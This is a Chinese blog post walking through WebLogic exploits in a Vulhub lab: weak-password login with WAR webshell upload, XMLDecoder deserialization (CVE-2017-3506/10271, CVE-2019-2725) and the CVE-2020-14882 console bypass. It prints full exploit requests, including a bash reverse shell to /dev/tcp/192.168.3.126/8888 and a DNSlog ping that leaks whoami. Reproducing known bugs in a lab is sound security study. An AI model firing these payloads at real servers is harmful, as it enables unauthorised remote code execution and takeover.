Vulhub靶场之weblogic漏洞复现

最新推荐文章于 2024-05-27 16:02:38 发布
最新推荐文章于 2024-05-27 16:02:38 发布
阅读量1.4k 收藏 6
点赞数
分类专栏: 渗透与测试 文章标签: web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66717977/article/details/129693492
版权

简介

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应用服务器软件(application server)之一,是世界上第一个成功商业化的J2EE应用服务器, 已推出到12c(12.2.1.4) 版。而此产品也延伸出WebLogic Portal,WebLogic Integration等企业用的中间件(但当下Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic Server之外的企业包),以及OEPE(Oracle Enterprise Pack for Eclipse)开发工具。

弱口令登录导致的rce

docker拉取镜像

docker-compose up -d

登录7001端口

拼接url http://192.168.3.108:7001/console

弱口令登录

这里弱口令错误次数超过五次会锁定,因此这里使用弱口令登录

这里成功登录

制作war包

单独建立一个文件夹,里面放冰蝎3的jsp木马


打开cmd,输入jar -cvf aaa.war .
将当前目录打包成war包
 

上传war包

点击部署

我这里冰蝎连接失败了,因此又重新上传一个哥斯拉的,步骤相同。

成功连接。

CVE-2017-3506/10271 XMLDecoder反序列化漏洞

拼接以下URL,有回显如下图可以判断wls-wsat组件存在。

/wls-wsat/CoordinatorPortType

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/ParticipantPortType

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationRequesterPortType11

linux反弹shell

直接刷新抓包本页面,然后进行修改数据包,这个是原版数据包。随后先将GET型的改成POST型的,burp右键后有一个功能就是专门转换数据包格式的。

改成POST型数据包后,还需要进行一些构造,才能成功RCE。其中Content-Type需要等于 text/xml,否则可能导致XMLDecoder不解析。下面是构造好的数据包。

​
POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: 192.168.3.108:7001

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Connection: close

Cookie: ADMINCONSOLESESSION=CsBPjQgJv12n5Gn6sHQhTXT74KQ0yrhXn0JC2XKlJqKY7bdsZqP4!-1250251804

Upgrade-Insecure-Requests: 1

Content-Type: text/xml

Content-Length: 640

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.4.0" class="java.beans.XMLDecoder">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/192.168.3.126/8888 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></void>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>

​

下面的图就是上面构造后的包,然后放包

放包后会出现这个界面

成功反弹shell

cve-2017-10271与3506他们的漏洞原理是一样的,只不过10271绕过了3506的补丁

CVE-2019-2725 wls-wsat反序列化远程代码执行漏洞

漏洞介绍:

此漏洞实际上是CVE-2017-10271的又一入口,CVE-2017-3506的补丁过滤了object;CVE-2017-10271的补丁过滤了new,method标签,且void后面只能跟index,array后面只能跟byte类型的class;CVE-2019-2725的补丁过滤了class,限制了array标签中的byte长度。

影响组件:

bea_wls9_async_response.war、wls-wsat.war

影响范围:

10.3.6.0、12.1.3.0

验证漏洞:

访问 /_async/AsyncResponseService,返回200即存在,返回404则不存在:

/_async/AsyncResponseService

/_async/AsyncResponseServiceJms

/_async/AsyncResponseServiceHttps

Dnslog验证shell

直接刷新进行抓包,然后进行修改数据包,跟上一个一样,都先需要将GET型数据包,转换成POST型数据包,然后再进行修改构造。

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.3.108:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 859
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping `whoami`.tsqohg.dnslog.cn</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

使用上面构造好的包,然后发包,202就是成功执行

这里收到了信息,说明存在漏洞

CVE-2020-14882未授权访问

拼接以下URL进行登录,如果能成功访问,说明存在未授权访问漏洞。

http://192.168.3.108:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

工具利用

xray

使用xray进行扫描的时候,要直接扫描根目录,如果直接扫描漏洞页面,会导致扫描不出漏洞,但是该靶场存在的漏洞很多,这次扫描的还是不全面,以下是扫描的页面。

 

扫描的结果

liqunkit

这个工具和xray的情况一样,直接访问漏洞连接,是无法扫描出漏洞的,要扫描根目录。

上面的是对漏洞页面扫描,结果无。

下面是对根目录扫描,有三个结果。

weblogicexploit

该工具只支持直接漏洞利用。

项目地址:GitHub - sp4zcmd/WeblogicExploit-GUI: Weblogic漏洞利用图形化工具 支持注入内存马、一键上传webshell、命令执行

 

连接成功

CengLnH
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
weblogic 漏洞统计 CVE
09-18
然而,如同任何复杂的软件系统,WebLogic也存在安全漏洞,这些漏洞可能被恶意攻击者利用,对服务器造成严重威胁。以下是所提及的一些CVE(Common Vulnerabilities and Exposures)编号以及它们涉及的安全问题: 1. ...
Vulhub靶场之Tomcat漏洞复现
weixin_66717977的博客
06-30 433
tomcat漏洞复现
vulhub靶场】Apache 中间件漏洞复现
M372109150的博客
05-10 1745
本文主要是对apache中间件漏洞复现,包括Apache HTTPD 换行解析漏洞(CVE-2017-15715)、Apache多后缀解析漏洞(apache_parsing_vulnerability)、Apache路径穿越漏洞(CVE-2021-41773)、Apache路径穿越漏洞(CVE-2021-42013)、Apache SSI 远程命令执行漏洞
Web安全技术期末考查-vulhub靶场搭建及漏洞复现
最新发布
weixin_52363821的博客
05-27 2315
vulhub靶场搭建及漏洞复现。搭建弱点环境,详细的漏洞验证过程,修复、防御方法。
【渗透测试】Weblogic系列漏洞
weixin_53972936的博客
11-01 3309
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
vulhub靶场-weblogic漏洞复现
m0_62008601的博客
07-18 1770
vulhub-weblogic漏洞复现集 weak-password CVE-2018-2894 SSRF(CVE-2014-4210) CVE-2020-14882&14883 CVE-2018-2628 CVE-2017-10271
Vulhub靶场】Nginx 中间件漏洞复现
M372109150的博客
05-02 1274
本文主要对nginx的漏洞进行复现,在vulhub靶场复现nginx文件名逻辑漏洞、Nginx越界读取缓存漏洞(CVE-2017-7529)、Nginx 配置错误导致漏洞以及解析漏洞
记一次weblogic-10.3.6.0靶场漏洞利用
屿的博客
09-15 7370
输入 find ./ -name oracle_logo.gif(文件名)进入Vuln-Range的weblogic-10.3.6.0靶场。(去掉. 去掉图片文件名再自己起一个新的文件名 xx.jsp)进入最开始的/uddiexplorer/下的自命名木马.jsp。删掉端口后面多余字符,输入/uddiexplorer/打印出的工作目录和刚刚保存的gif文件路径拼接在一起。在weblogic工具里使用pwd打印工作目录。连接复制到weblogic的shell上传。找到的路径用记事本保存一下。
Vulnhub靶场渗透测试系列DC-1(Drupal漏洞)
qq_45722813的博客
11-14 4864
Vulnhub渗透测试系列-DC-1 靶机下载 地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机使用kali2021的VMware虚拟机,IP地址:192.168.172.131 在VMware中导入靶机,中间可能出现这个问题,直接点击【重试】 导入之后将网络模式设置为NAT模式 开启靶机虚拟机过程出现下面这个,点击【是】或【否】都可 虚拟机已开启 在kali攻击机中使用命令nmap -Pn 192.168.172.1/24扫描,进行主机发现,获取靶机的IP地址,
Weblogic漏洞扫描工具
02-22
本篇将详细探讨"Weblogic漏洞扫描工具"的相关知识点,包括Weblogic漏洞类型、反序列化攻击、SSRF漏洞以及如何进行有效的漏洞扫描。 首先,我们要理解Weblogic的`console页面探测`。Weblogic Console是Weblogic...
weblogic漏洞检测集合工具
11-17
weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
Weblogic反序列化漏洞补丁包
01-18
Weblogic反序列化漏洞补丁包是针对Oracle WebLogic Server中的一个严重安全问题而发布的修复程序。WebLogic Server是一款广泛使用的Java EE应用服务器,为企业级应用程序提供了一个强大的运行环境。然而,像许多复杂...
weblogic 漏洞需要替换的jar包
11-16
weblogic 漏洞需要替换的jar包
安装了java后,为什么有些jar不能执行
yuanlirong22的专栏
07-06 8642
安装了java后,为什么有些jar不能执行,点击jar没有反应。 因为不同的jar需要不同版本的java.exe去执行,所以安装了java后也会出现jar不能执行的情况。
vulhub靶场sql注入漏洞复现
赵花花08042的博客
12-13 3218
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234) https://github.com/vulhub/vulhub/blob/master/django/CVE-2019-14234/README.zh-cn.md https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483996&idx=1&sn=4254dc0a54003cccb29dd42935f8ccea.
vulhub靶场-tomcat漏洞复现
m0_62008601的博客
07-23 1340
tomcat漏洞复现合集
weblogic 反序列化漏洞检测工具
09-12
您好!对于WebLogic反序列化漏洞的检测,可以使用以下几种工具: 1. ysoserial:这是一个常用的Java反序列化漏洞利用工具,可以生成不同Payload来测试WebLogic的反序列化漏洞。您可以通过Github找到它的相关代码和用法。 2. AppScan:这是一款商业化的Web应用安全测试工具,支持对WebLogic等服务器的漏洞扫描与检测,可以帮助您发现WebLogic反序列化漏洞。 3. OWASP ZAP:这是一个开源的Web应用安全扫描工具,也可以用来检测WebLogic反序列化漏洞。您可以使用其自带的漏洞扫描功能进行测试。 以上是一些常用的WebLogic反序列化漏洞检测工具,您可以根据实际情况选择适合您的工具进行使用。同时,在进行任何漏洞扫描和测试之前,请确保已获得合法授权,并遵循适用的法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值